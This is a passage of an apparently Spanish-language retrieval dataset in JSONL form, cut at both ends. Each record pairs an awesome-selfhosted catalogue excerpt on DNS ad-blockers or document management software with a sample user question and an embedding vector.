-0.07408, 0.0031, -0.00071, 0.02434, -0.0189, 0.04848, -0.01337, -0.06881, 0.01793, -0.08309, 0.03037, -0.09675, -0.04274, -0.04683, 0.07245, -0.01533, -0.06358, 0.07501, -0.01566, -0.01012, 0.01048, 0.02356, -0.01157, 0.01742, 0.0005, -0.05608, -0.05071, -0.05694, 0.00502, 0.0138, 0.00555, -0.0895, 0.01545, -0.00913, -0.06676, -0.01244, -0.01459, -0.00936, -0.07117, -0.00039, -0.02874, 0.07362, 0.02172, 0.05517, 0.0964, 0.00824, 0.03358, 0.02009, -0.05129, -0.00111, 0.0363, -0.00772, 0.04341, 0.0089, 0.0645, 0.04648, -0.00146, 0.01806, -0.0811, -0.01827, 0.01783, 0.01212, -0.01664, 0.03071, -0.00785, -0.01275, -0.0497, 0.06978, -0.01635, -0.00815, 0.04942, 0.03327, -0.01003, -0.03941, 0.07794, 0.04888, -0.00979, 0.01733, -0.02075, -0.01658, -0.05416, 0.02246, -0.04361, -0.04807, -0.01527, 0.01183, -0.00251, -0.02803, 0.05837, 0.05743]} +{"tipo": "pregunta", "herramienta": "DNS", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / DNS", "tema": "dns", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / DNS: AdGuard Home β€” User-friendly ads & trackers blocking DNS server [GPL-3.0, Docker]. blocky β€” Fast and lightweight DNS proxy as ad-blocker for local network with many features (alternative to Pi-hole) [Apache-2.0, Go/Docker]. Maza ad blocking β€” Local ad blocker. Like Pi-hole but local and using your operating system [Apache-2.0, Shell]. Numa β€” Ad-blocking DNS resolver with DNSSEC-validating recursive resolution, DoH/DoT/Oblivious DoH, ephemeral overrides, and local service domains, in a single Rust binary (alternative to Pi-hole, AdGuard Home, NextDNS) [MIT, Rust/Docker/Nix]. Pi-hole β€” Blackhole for Internet advertisements with a GUI for management and monitoring [EUPL-1.2, Shell/PHP/Docker]. Technitium DNS Server β€” Authoritative/recursive DNS server with ad blocking functionality [GPL-3.0, Docker/C#].", "indexar": "con que puedo montar un servidor DNS que bloquee rastreadores y soporte resoluciΓ³n recursiva segura?", "v": [0.03754, -0.08171, -0.3103, -0.22684, -0.02417, -0.02104, 0.00196, -0.07627, -0.09455, -0.00079, -0.02177, -0.12956, 0.06844, -0.13803, 0.02464, -0.01906, 0.01799, 0.01147, 0.00228, 0.00616, 0.00704, -0.20558, 0.01427, 0.03525, 0.04412, -0.01044, -0.04278, 0.00755, -0.09167, -0.0999, 0.03411, -0.08603, -0.01198, 0.05276, -0.05416, -0.03969, -0.06136, 0.05679, 0.01797, -0.01586, 0.0006, -0.11813, -0.05186, -0.00506, -0.09391, -0.05294, 0.09784, -0.01181, 0.11124, -0.11099, -0.03889, -0.09927, -0.15006, -0.02056, -0.08203, 0.02484, 0.21549, -0.05002, 0.0489, -0.07008, -0.19866, -0.03356, 0.05093, -0.07498, 0.05929, -0.04396, 0.03222, -0.07329, -0.08162, -0.06171, -0.01379, 0.02114, 0.09459, -0.03361, 0.04956, 0.05217, 0.00477, 0.04065, 0.11277, 0.17675, 0.00212, 0.00585, -0.03736, 0.11196, -0.07591, -0.00576, -0.04643, -0.11467, 0.0206, -0.0983, 0.07704, 0.05989, -0.05035, 0.04528, 0.02296, -0.02403, 0.12701, 0.0744, -0.01558, -0.06077, 0.004, 0.06931, -0.01647, 0.11109, 0.06833, 0.06355, 0.08476, -0.06792, 0.08337, -0.07027, 0.02112, 0.06549, -0.11875, -0.04095, -0.08996, -0.03732, -0.06836, 0.02835, 0.05886, 0.02693, -0.00239, -0.02166, 0.03012, 0.03149, 0.09384, -0.0226, 0.06441, 0.01543, -0.03333, -0.11059, -0.03668, -0.02338, -0.07523, -0.03811, -0.05163, 0.05925, 0.04795, -0.05949, -0.00307, -0.01553, 0.09844, -0.02135, 0.01354, -0.02636, 0.06513, -0.02474, 0.05213, -0.03623, -0.05614, 0.01416, 0.05416, 0.01896, -0.02835, -0.01975, -0.10578, -0.03573, 0.02267, -0.03192, 0.02258, 0.13291, 0.01156, 0.04771, 0.02856, 0.08484, -0.02112, 0.04732, -0.06165, -0.01123, 0.05593, 0.03422, -0.03825, -0.01317, 0.01775, -0.06178, -0.01636, -0.02782, -0.0406, -0.02043, 0.02032, 0.00756, -0.01639, -0.03306, 0.02834, 0.01401, -0.05276, -0.00452, 0.03186, 0.03555, -0.01577, 0.02437, 0.02387, 0.03669, -0.079, -0.00842, -0.00356, -0.03805, -0.02074, -0.05581, 0.03978, 0.00319, -0.00894, -0.05565, 0.01298, -0.03716, -0.01521, -0.01413, -0.07116, 0.06384, 0.04182, 0.00702, 0.01414, -0.05299, 0.0547, -0.01772, -0.05701, 0.02835, 0.00833, -0.01665, -0.06798, -0.00637, -0.01729, 0.0389, -0.00018, 0.0612, 0.01957, -0.03696, 0.02817, -0.01823, 0.04037, -0.01548, -0.00018, 0.01761, -0.03379, 0.01061, 0.03057, 0.03307, 0.01673, -0.0024, -0.00639, -0.00353, -0.00517, 0.03155, -0.04407, -0.02445, -0.00939, -0.07453, -0.04569, 0.03887, -0.01436, -0.03731, -0.01121, -0.01571, 0.01394, -0.04847, -0.00619, -0.00981]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: BentoPDF β€” Powerful, privacy-first, client-side PDF toolkit that allows you to manipulate, edit, merge, and process PDF files directly in your browser [⚠, AGPL-3.0, Nodejs/Docker]. Docspell β€” Auto-tagging document organizer and archive [GPL-3.0, Scala/Java/Docker]. Documenso β€” Digital document signing platform (alternative to DocuSign) [AGPL-3.0, Nodejs/Docker]. Docuseal β€” Create, fill, and sign digital documents (alternative to DocuSign) [AGPL-3.0, Docker]. EveryDocs β€” Simple Document Management System for private use with basic functionality to organize your documents digitally [GPL-3.0, Docker/Ruby]. Gotenberg β€” Developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more [MIT, Docker]. I, Librarian β€” Organize PDF papers and office documents. It provides a lot of extra features for students and research groups both in industry and academia [GPL-3.0, PHP].", "indexar": "que programa sirve para editar y fusionar archivos PDF sin salir del navegador?", "v": [0.07453, -0.11753, -0.16342, -0.27038, -0.00763, -0.11785, 0.06524, -0.12289, 0.02371, -0.07246, -0.04877, -0.12301, -0.04536, -0.14179, -0.04866, -0.06942, 0.11774, -0.04577, 0.03868, -0.0089, 0.07313, 0.0721, 0.0614, -0.12376, -0.02789, 0.03349, -0.09607, -0.0179, -0.05215, -0.07472, 0.00125, 0.00645, 0.14092, -0.01451, -0.11952, 0.05989, 0.06807, 0.04804, -0.08169, 0.03473, 0.00096, 0.06349, -0.072, 0.12931, -0.07788, -0.01785, 0.00877, 0.05116, 0.01811, -0.01034, 0.06703, 0.05904, -0.03512, 0.1495, -0.0462, -0.09014, 0.01325, -0.19506, -0.03419, -0.03381, 0.00071, 0.07663, -0.0012, -0.00218, -0.05478, -0.03873, -0.05447, 0.03445, 0.00112, 0.0868, -0.04133, 0.0549, 0.06739, -0.04806, -0.12315, 0.02193, 0.03407, -0.01458, -0.03632, -0.00513, 0.22262, -0.05284, -0.00458, 0.05795, -0.07937, -0.08995, 0.05638, -0.0211, 0.01311, 0.02664, 0.06109, 0.02873, 0.01522, 0.01676, 0.02729, -0.09474, 0.1373, -0.05833, 0.01366, 0.0137, 0.04222, 0.00851, -0.06093, 0.06827, -0.00707, 0.03722, 0.0356, -0.0265, -0.00141, 0.12711, 0.08941, -0.00215, 0.01632, -0.10174, -0.0809, 0.02334, -0.00012, -0.09769, -0.05463, -0.14626, -0.07265, -0.04998, -0.06496, -0.04038, -0.01299, 0.07239, 0.06259, 0.13337, -0.10373, 0.02484, 0.06503, 0.00033, -0.08908, 0.06619, -0.0615, -0.06388, 0.04323, 0.044, -0.03616, -0.03683, 0.07752, -0.0386, 0.01662, 0.06371, 0.0234, -0.0367, 0.05264, -0.03223, -0.03241, -0.14579, 0.00191, -0.06973, -0.04487, -0.03848, -0.0724, -0.01813, 0.00493, -0.00574, -0.02238, 0.04531, -0.05062, 0.04485, -0.00507, -0.04568, -0.0219, -0.04532, 0.02299, 0.01508, 0.1042, -0.00755, 0.05454, 0.00455, 0.01867, -0.07851, -0.01168, 0.03599, -0.0132, 0.00893, 0.05544, 0.04306, -0.01451, -0.02423, 0.05586, 0.0726, -0.08078, -0.04913, 0.00615, 0.00536, -0.03125, 0.00757, -0.03414, 0.02027, -0.07869, 0.00104, 0.04017, -0.04903, -0.03178, 0.0044, 0.05483, -0.01527, 0.00459, -0.03561, 0.00277, -0.01014, 0.05534, 0.06839, 0.02964, -0.01334, 0.06125, 0.06063, -0.052, -0.03162, 0.0416, -0.00326, -0.01969, -0.03954, 0.02339, 0.04605, 0.02773, 0.06788, 0.0071, -0.04693, 0.02462, 0.03159, 0.07377, -0.02323, 0.07179, 0.00874, -0.0153, 0.01649, -0.00902, -0.03268, -0.02379, 0.03705, 0.01141, 0.03768, 0.00063, 0.04088, -0.03961, -0.08256, -0.04234, 0.06336, 0.00169, -0.04804, -0.05817, 0.01377, -0.04026, -0.06705, 0.05598, 0.00986, -0.0589, 0.04917, 0.02661, -0.00269, 0.02692, 0.02166]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: BentoPDF β€” Powerful, privacy-first, client-side PDF toolkit that allows you to manipulate, edit, merge, and process PDF files directly in your browser [⚠, AGPL-3.0, Nodejs/Docker]. Docspell β€” Auto-tagging document organizer and archive [GPL-3.0, Scala/Java/Docker]. Documenso β€” Digital document signing platform (alternative to DocuSign) [AGPL-3.0, Nodejs/Docker]. Docuseal β€” Create, fill, and sign digital documents (alternative to DocuSign) [AGPL-3.0, Docker]. EveryDocs β€” Simple Document Management System for private use with basic functionality to organize your documents digitally [GPL-3.0, Docker/Ruby]. Gotenberg β€” Developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more [MIT, Docker]. I, Librarian β€” Organize PDF papers and office documents. It provides a lot of extra features for students and research groups both in industry and academia [GPL-3.0, PHP].", "indexar": "cual es una alternativa libre a DocuSign para firmar documentos digitalmente?", "v": [0.00657, 0.06973, -0.03217, -0.05089, 0.09913, -0.06882, -0.03387, -0.04327, -0.15299, 0.02424, -0.02116, -0.21225, -0.03382, -0.2113, -0.00281, -0.07772, 0.13718, -0.11707, -0.03274, -0.06496, 0.07987, -0.01884, -0.0261, -0.09651, 0.02907, -0.20076, -0.07043, -0.01058, -0.01615, 0.05391, 0.15512, 0.01653, 0.01171, -0.05141, -0.02068, 0.00434, 0.0505, 0.06549, 0.06692, 0.06993, 0.00465, 0.10723, -0.06826, 0.15737, -0.12832, 0.0271, 0.01316, 0.10579, 0.05283, 0.02696, -0.05241, -0.05093, -0.06722, 0.07557, -0.07093, 0.03749, 0.18558, -0.04988, 0.0233, -0.11853, -0.10863, 0.02096, -0.05087, 0.00587, 0.07231, 0.03287, 0.02081, 0.05295, -0.06909, 0.05436, 0.02707, 0.00878, 0.02769, -0.05545, -0.06413, 0.00755, -0.06943, -0.11729, 0.00329, 0.09271, 0.05129, -0.02329, -0.03827, 0.04012, -0.03272, -0.10496, -0.0661, -0.07961, 0.03641, 0.00196, 0.16102, 0.05526, 0.04443, 0.01127, 0.06379, -0.03891, 0.03772, 0.00955, -0.06569, 0.0509, 0.05346, 0.12311, -0.00454, -0.08336, -0.08852, -0.08981, -0.07648, -0.01144, -0.06195, 0.09013, -0.07463, 0.10512, -0.02996, 0.07883, -0.03099, -0.02699, 0.04933, 0.00314, -0.00647, -0.02468, 0.08642, -0.04614, -0.08453, -0.03762, 0.02527, 0.01253, -0.02408, -0.01659, -0.05207, 0.02714, 0.05959, 0.01987, -0.14627, -0.0824, -0.01825, 0.00933, 0.00765, -0.07976, 0.01135, -0.04127, 0.06485, -0.07724, 0.00686, 0.02957, 0.0403, -0.01737, -0.02771, -0.02648, -0.07562, -0.00103, -0.0889, -0.00406, -0.01908, 0.12593, -0.05666, 0.00051, 0.01852, -0.03033, -0.12097, 0.07445, 0.00635, -0.01198, -0.032, 0.04829, -0.02119, -0.02347, -0.0317, -0.00108, -0.05746, -0.00054, 0.05939, 0.0056, -0.00246, -0.0827, 0.06084, -0.08308, 0.00597, -0.00715, 0.05733, -0.05954, -0.07494, 0.01001, -0.02256, 0.04504, -0.0006, 0.01598, 0.03309, -0.04801, 0.08526, -0.00155, -0.00883, 0.05185, -0.07179, -0.01533, -0.02642, -0.04554, -0.06023, -0.04145, 0.00377, -0.05275, -0.0579, -0.03244, -0.04702, -0.02805, 0.01259, 0.03412, -0.09194, 0.04276, -0.035, 0.04108, 0.00948, -0.05538, 0.04427, 0.00207, -0.08972, -0.01164, -0.0028, 0.01243, -0.01837, -0.00528, 0.10947, -0.01818, 0.04659, -0.02629, 0.04212, -0.02162, 0.09901, 0.05592, -0.03431, -0.0084, 0.03347, 0.01705, -0.03885, 0.00033, 0.0047, 0.08555, 0.0264, -0.01376, -0.0666, -0.06793, 0.0421, 0.06594, -0.05716, -0.00014, -0.0452, -0.00163, -0.10249, 0.01154, 0.00326, -0.02551, 0.01691, 0.04906, 0.04541, -0.01804, 0.02838, -0.0559]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: BentoPDF β€” Powerful, privacy-first, client-side PDF toolkit that allows you to manipulate, edit, merge, and process PDF files directly in your browser [⚠, AGPL-3.0, Nodejs/Docker]. Docspell β€” Auto-tagging document organizer and archive [GPL-3.0, Scala/Java/Docker]. Documenso β€” Digital document signing platform (alternative to DocuSign) [AGPL-3.0, Nodejs/Docker]. Docuseal β€” Create, fill, and sign digital documents (alternative to DocuSign) [AGPL-3.0, Docker]. EveryDocs β€” Simple Document Management System for private use with basic functionality to organize your documents digitally [GPL-3.0, Docker/Ruby]. Gotenberg β€” Developer-friendly API to interact with powerful tools like Chromium and LibreOffice for converting numerous document formats (HTML, Markdown, Word, Excel, etc.) into PDF files, and more [MIT, Docker]. I, Librarian β€” Organize PDF papers and office documents. It provides a lot of extra features for students and research groups both in industry and academia [GPL-3.0, PHP].", "indexar": "con que puedo organizar automΓ‘ticamente mis archivos de documento y archivarlos en casa?", "v": [0.04197, 0.11719, 0.05002, -0.14483, 0.00151, -0.05004, 0.07824, -0.00162, -0.21673, 0.00045, -0.20648, -0.14551, 0.07447, -0.0467, 0.07011, -0.02482, 0.22357, -0.0634, -0.00792, 0.02349, -0.03485, 0.03305, -0.03059, 0.07414, -0.02923, -0.15273, 0.05529, 0.07147, -0.16019, -0.00565, -0.06304, 0.10102, 0.04603, 0.00499, 0.01958, 0.08583, 0.02298, 0.10308, -0.18758, -0.00228, -0.03332, 0.11074, -0.13225, 0.16461, -0.07008, -0.05687, 0.04828, 0.04601, -0.03206, -0.0465, -0.03411, -0.07051, 0.02231, 0.11527, -0.09522, -0.04895, -0.01354, -0.1254, 0.08261, 0.01259, -0.07999, 0.05942, -0.01898, 0.11805, 0.01358, 0.04433, -0.0404, 0.04322, -0.01662, 0.04793, -0.07511, 0.08952, 0.07544, 0.00733, -0.05455, -0.01511, -0.05149, -0.06083, -0.09785, 0.11249, 0.05165, -0.0596, -0.02283, 0.08423, -0.02259, -0.1258, -0.03796, 0.01176, 0.07273, -0.10737, -0.01456, -0.03865, -0.00618, 0.06019, 0.06066, -0.07088, 0.12023, 0.04446, 0.006, -0.04324, -0.04138, -0.06857, 0.0264, 0.13137, 0.07266, 0.04153, -0.00351, 0.11363, -0.02468, -0.03967, -0.02873, 0.04276, 0.01689, 0.10721, -0.05465, 0.00847, 0.02762, 0.0069, 0.0475, -0.02104, 0.00163, -0.03776, 0.04086, 0.01601, -0.05919, -0.09653, 0.06965, 0.09808, -0.02375, 0.0833, 0.03738, 0.03534, -0.08874, -0.0081, 0.00855, 0.0157, -0.075, -0.03245, -0.01755, -0.07864, 0.04214, 0.02438, -0.0257, 0.01678, 0.09521, -0.0178, -0.06319, 0.00798, -0.07555, -0.06682, -0.05787, -0.02013, 0.02523, -0.03453, -0.00521, 0.06419, 0.00816, -0.10561, -0.00179, -0.04131, -0.06428, 0.05369, -0.06837, 0.0255, -0.03639, -0.02962, 0.07929, 0.00768, -0.04263, -0.03801, 0.0119, 0.00127, -0.04349, -0.06766, -0.02819, -0.01133, -0.00582, -0.03119, 0.02152, -0.02492, -0.01888, 0.04235, -0.03459, 0.01133, -0.02448, -0.00289, 0.11986, -0.01831, 0.04074, -0.00361, -0.03062, 0.00281, -0.04187, 0.03471, -0.0613, -0.05193, -0.1, 0.00194, 0.03597, 0.00453, -0.01543, -0.05623, 0.03888, 0.07205, 0.04934, 0.01793, -0.05673, -0.00245, 0.0345, 0.02241, -0.00834, -0.03483, 0.1053, -0.00786, -0.09124, 0.0058, -0.00569, -0.01771, 0.0366, 0.02542, 0.06123, 0.03899, 0.04698, -0.06236, 0.05298, -0.0155, 0.02136, 0.00971, 0.03844, 0.00569, -0.05561, 0.01347, 0.02191, 0.04219, 0.07117, 0.0176, 0.01936, -0.07705, -0.01981, -0.0231, 0.00512, 0.03228, -0.01027, 0.02108, -0.03797, -0.04655, -0.00703, 0.05467, 0.04214, -0.01641, 0.03033, -0.01062, 0.04124, -0.01237, 0.0008, 0.0001]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: Mayan EDMS β€” Electronic document management system for your documents with preview generation, OCR, and automatic categorization among other features [GPL-2.0, Docker/K8S]. OpenSign β€” Document signing software (alternative to DocuSign) [⚠, AGPL-3.0, Nodejs/Docker]. Paperless-ngx β€” Scan, index, and archive all of your paper documents with an improved interface (fork of Paperless) [GPL-3.0, Python/Docker]. Papermerge β€” Document management system focused on scanned documents (electronic archives). Features file browsing in similar way to dropbox/google drive. OCR, full text search, text overlay/selection [Apache-2.0, Docker/K8S]. Papra β€” Minimalist document storage, management and archiving platform designed to be simple to use and accessible to everyone [AGPL-3.0, Docker]. PdfDing β€” PDF manager, viewer and editor offering a seamless user experience on multiple devices. It's designed to be minimal, fast, and easy to set up using Docker [AGPL-3.0, Docker/K8S].", "indexar": "que programa puedo usar para gestionar documentos escaneados y hacer OCR?", "v": [-0.09917, -0.00709, -0.12477, -0.20546, 0.07018, -0.14824, 0.05264, -0.01533, -0.09735, -0.05485, -0.17047, -0.12753, 0.05714, -0.20935, 0.0135, 0.0082, 0.07378, -0.03886, -0.01869, 0.08762, -0.07532, -0.00016, 0.08009, 0.06139, -0.10606, 0.03169, 0.00495, -0.11847, -0.01828, -0.04435, -0.01912, 0.16747, 0.03508, -0.06889, -0.00825, 0.0637, -0.02535, -0.09047, 0.03397, 0.07448, -0.00759, 0.02593, -0.12467, 0.10113, 0.12257, 0.04523, 0.07245, 0.09375, -0.07332, -0.00248, -0.08938, -0.1601, -0.11964, 0.02472, 0.00954, -0.08398, 0.0109, -0.15092, -0.04971, -0.05338, 0.04837, 0.09235, 0.01988, 0.03925, -0.04552, 0.00476, 0.13154, 0.05939, -0.08092, 0.07414, -0.07999, 0.11917, 0.05796, -0.00833, -0.01489, -0.05785, 0.00418, -0.0029, 0.04287, 0.04076, -0.02718, 0.02415, -0.02987, 0.00809, -0.13516, -0.06278, 0.03506, -0.00209, -0.00955, -0.02482, -0.02346, -0.00356, 0.00704, -0.04021, 0.05534, -0.06843, 0.09275, 0.01117, 0.03066, 0.03499, -0.0136, -0.04023, -0.07864, 0.0878, -0.10142, 0.03215, 0.06673, -0.06587, -0.04496, 0.08157, -0.08919, 0.08139, -0.06617, 0.05335, -0.07077, 0.06185, -0.00305, -0.04625, 0.01777, -0.0534, -0.03943, -0.00047, -0.01586, 0.02339, 0.16138, -0.07268, 0.05494, 0.11622, -0.06259, 0.07949, -0.05599, -0.01086, -0.07519, -0.08646, -0.0624, -0.05352, -0.01923, -0.07171, 0.01024, -0.06113, -0.0511, 0.01188, -0.02776, 0.03834, 0.06463, -0.03942, 0.00305, -0.04653, 0.04283, -0.02005, 0.06796, -0.06662, -0.01239, 0.05045, -0.01822, -0.0315, 0.0634, -0.00129, -0.14985, -0.0188, -0.09441, -0.01186, -0.01185, 0.07152, 0.06872, -0.04346, 0.01878, 0.04584, 0.01188, 0.07124, 0.04326, 0.0595, 0.07739, -0.05515, 0.10177, -0.05474, 0.02314, -0.06159, 0.00054, -0.00597, -0.0675, 0.03416, 0.07684, 0.03797, 0.0061, 0.01077, -0.0036, 0.03725, -0.01151, 0.00991, 0.00492, 0.08171, 0.01789, -0.0221, 0.00622, -0.03816, 0.00087, -0.0194, 0.01818, -0.02837, -0.0642, 0.00153, 0.00719, -0.04562, 0.04604, 0.04902, -0.07788, 0.03123, 0.09573, 0.05927, -0.02027, -0.03545, 0.04968, 0.0015, -0.0895, -0.00147, -0.02993, 0.0638, 0.02095, -0.05528, 0.02475, -0.00918, 0.05924, 0.03692, 0.05614, -0.04986, 0.04189, -0.0013, -0.02507, -0.01769, -0.01201, 0.03122, 0.01525, -0.01798, 0.02831, -0.00052, 0.01565, -0.03708, -0.01688, -0.05788, -0.01518, 0.08615, -0.00279, 0.00966, -0.06777, 0.02564, -0.05992, 0.02994, 0.04041, 0.00391, 0.02939, 0.00191, 0.03028, -0.03377, 0.0288, 0.02275]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: Mayan EDMS β€” Electronic document management system for your documents with preview generation, OCR, and automatic categorization among other features [GPL-2.0, Docker/K8S]. OpenSign β€” Document signing software (alternative to DocuSign) [⚠, AGPL-3.0, Nodejs/Docker]. Paperless-ngx β€” Scan, index, and archive all of your paper documents with an improved interface (fork of Paperless) [GPL-3.0, Python/Docker]. Papermerge β€” Document management system focused on scanned documents (electronic archives). Features file browsing in similar way to dropbox/google drive. OCR, full text search, text overlay/selection [Apache-2.0, Docker/K8S]. Papra β€” Minimalist document storage, management and archiving platform designed to be simple to use and accessible to everyone [AGPL-3.0, Docker]. PdfDing β€” PDF manager, viewer and editor offering a seamless user experience on multiple devices. It's designed to be minimal, fast, and easy to set up using Docker [AGPL-3.0, Docker/K8S].", "indexar": "cual es una alternativa libre a DocuSign para firmar documentos digitalmente?", "v": [0.00657, 0.06973, -0.03217, -0.05089, 0.09913, -0.06882, -0.03387, -0.04327, -0.15299, 0.02424, -0.02116, -0.21225, -0.03382, -0.2113, -0.00281, -0.07772, 0.13718, -0.11707, -0.03274, -0.06496, 0.07987, -0.01884, -0.0261, -0.09651, 0.02907, -0.20076, -0.07043, -0.01058, -0.01615, 0.05391, 0.15512, 0.01653, 0.01171, -0.05141, -0.02068, 0.00434, 0.0505, 0.06549, 0.06692, 0.06993, 0.00465, 0.10723, -0.06826, 0.15737, -0.12832, 0.0271, 0.01316, 0.10579, 0.05283, 0.02696, -0.05241, -0.05093, -0.06722, 0.07557, -0.07093, 0.03749, 0.18558, -0.04988, 0.0233, -0.11853, -0.10863, 0.02096, -0.05087, 0.00587, 0.07231, 0.03287, 0.02081, 0.05295, -0.06909, 0.05436, 0.02707, 0.00878, 0.02769, -0.05545, -0.06413, 0.00755, -0.06943, -0.11729, 0.00329, 0.09271, 0.05129, -0.02329, -0.03827, 0.04012, -0.03272, -0.10496, -0.0661, -0.07961, 0.03641, 0.00196, 0.16102, 0.05526, 0.04443, 0.01127, 0.06379, -0.03891, 0.03772, 0.00955, -0.06569, 0.0509, 0.05346, 0.12311, -0.00454, -0.08336, -0.08852, -0.08981, -0.07648, -0.01144, -0.06195, 0.09013, -0.07463, 0.10512, -0.02996, 0.07883, -0.03099, -0.02699, 0.04933, 0.00314, -0.00647, -0.02468, 0.08642, -0.04614, -0.08453, -0.03762, 0.02527, 0.01253, -0.02408, -0.01659, -0.05207, 0.02714, 0.05959, 0.01987, -0.14627, -0.0824, -0.01825, 0.00933, 0.00765, -0.07976, 0.01135, -0.04127, 0.06485, -0.07724, 0.00686, 0.02957, 0.0403, -0.01737, -0.02771, -0.02648, -0.07562, -0.00103, -0.0889, -0.00406, -0.01908, 0.12593, -0.05666, 0.00051, 0.01852, -0.03033, -0.12097, 0.07445, 0.00635, -0.01198, -0.032, 0.04829, -0.02119, -0.02347, -0.0317, -0.00108, -0.05746, -0.00054, 0.05939, 0.0056, -0.00246, -0.0827, 0.06084, -0.08308, 0.00597, -0.00715, 0.05733, -0.05954, -0.07494, 0.01001, -0.02256, 0.04504, -0.0006, 0.01598, 0.03309, -0.04801, 0.08526, -0.00155, -0.00883, 0.05185, -0.07179, -0.01533, -0.02642, -0.04554, -0.06023, -0.04145, 0.00377, -0.05275, -0.0579, -0.03244, -0.04702, -0.02805, 0.01259, 0.03412, -0.09194, 0.04276, -0.035, 0.04108, 0.00948, -0.05538, 0.04427, 0.00207, -0.08972, -0.01164, -0.0028, 0.01243, -0.01837, -0.00528, 0.10947, -0.01818, 0.04659, -0.02629, 0.04212, -0.02162, 0.09901, 0.05592, -0.03431, -0.0084, 0.03347, 0.01705, -0.03885, 0.00033, 0.0047, 0.08555, 0.0264, -0.01376, -0.0666, -0.06793, 0.0421, 0.06594, -0.05716, -0.00014, -0.0452, -0.00163, -0.10249, 0.01154, 0.00326, -0.02551, 0.01691, 0.04906, 0.04541, -0.01804, 0.02838, -0.0559]} +{"tipo": "pregunta", "herramienta": "Document Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Document Management", "tema": "document management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Document Management: Mayan EDMS β€” Electronic document management system for your documents with preview generation, OCR, and automatic categorization among other features [GPL-2.0, Docker/K8S]. OpenSign β€” Document signing software (alternative to DocuSign) [⚠, AGPL-3.0, Nodejs/Docker]. Paperless-ngx β€” Scan, index, and archive all of your paper documents with an improved interface (fork of Paperless) [GPL-3.0, Python/Docker]. Papermerge β€” Document management system focused on scanned documents (electronic archives). Features file browsing in similar way to dropbox/google drive. OCR, full text search, text overlay/selection [Apache-2.0, Docker/K8S]. Papra β€” Minimalist document storage, management and archiving platform designed to be simple to use and accessible to everyone [AGPL-3.0, Docker]. PdfDing β€” PDF manager, viewer and editor offering a seamless user experience on multiple devices. It's designed to be minimal, fast, and easy to set up using Docker [AGPL-3.0, Docker/K8S].", "indexar": "que herramienta sirve para crear un archivo de documentos propio que funcione como Dropbox pero en la nube?", "v": [0.00935, -0.02349, -0.16248, -0.13289, 0.03597, -0.09902, 0.03575, 0.00462, -0.08677, -0.11026, -0.0976, -0.16112, -0.03626, -0.13924, -0.11678, -0.11536, 0.10552, -0.1361, -0.04611, -0.02776, 0.02344, 0.00872, -0.12032, 0.02222, -0.01385, -0.14861, 0.0172, 0.04444, -0.18143, 0.10173, 0.06853, -0.01275, 0.05296, -0.05521, -0.00863, -0.04949, 0.01065, -0.01254, -0.11375, 0.09092, 0.05473, 0.04687, -0.17755, 0.22656, -0.14201, 0.0316, 0.01341, 0.01083, -0.0115, 0.07675, -0.03216, -0.12504, -0.0535, 0.09792, -0.12128, -0.07552, 0.08839, -0.19063, 0.08566, -0.04444, -0.16538, 0.09742, -0.10006, -0.05496, 0.01593, -0.06244, 0.00572, -0.0294, -0.14683, 0.0652, -0.0373, 0.11001, 0.00636, -0.03275, 0.04158, 0.03768, 0.01681, -0.02474, -0.10054, 0.07059, 0.09292, 0.04296, -0.04662, -0.02018, -0.16822, -0.10303, 0.06659, 0.00289, 0.08958, -0.01127, 0.00233, 0.05062, -2e-05, 0.06341, 0.06154, -0.00796, 0.05164, 0.0014, -0.03214, -0.00497, 0.06215, 0.02278, -0.0062, 0.00749, -0.03853, 0.07696, 0.02437, -0.04509, -0.02752, -0.0042, 0.03828, 0.03172, 0.08848, 0.07701, -0.02378, -0.02263, 0.0169, -0.06584, -0.01406, 0.00438, 0.02262, -0.03113, -0.03121, -0.02386, 0.00676, -0.05658, -0.05868, 0.047, -0.06937, 0.01824, -0.01477, 0.01746, -0.097, 0.0249, -0.00726, -0.00331, -0.03344, -0.10223, -0.03046, -0.07365, 0.04664, -0.03728, -0.01427, -0.00048, 0.05901, -0.03012, 0.03829, -0.00596, -0.02237, -0.04245, 0.03877, -0.05625, -0.06634, -0.02725, -0.07524, 0.06154, -0.0214, -0.06035, -0.10815, 0.01828, 0.00097, -0.0035, -0.02884, 0.04353, -0.00827, -0.05473, 0.03675, 0.02602, 0.01049, 0.04194, -0.03264, -0.02198, -0.00338, -0.09197, -0.00419, -0.05645, 0.00764, -0.04288, 0.0778, -0.00144, -0.03059, -0.03332, 0.00937, 0.04783, -0.0479, -0.09328, 0.03151, -0.04239, 0.03158, 0.06156, -0.0241, 0.02311, -0.04877, -0.00458, 0.01631, -0.05438, -0.07637, -0.08178, -0.0014, 0.04325, -0.05688, -0.03414, -0.05999, 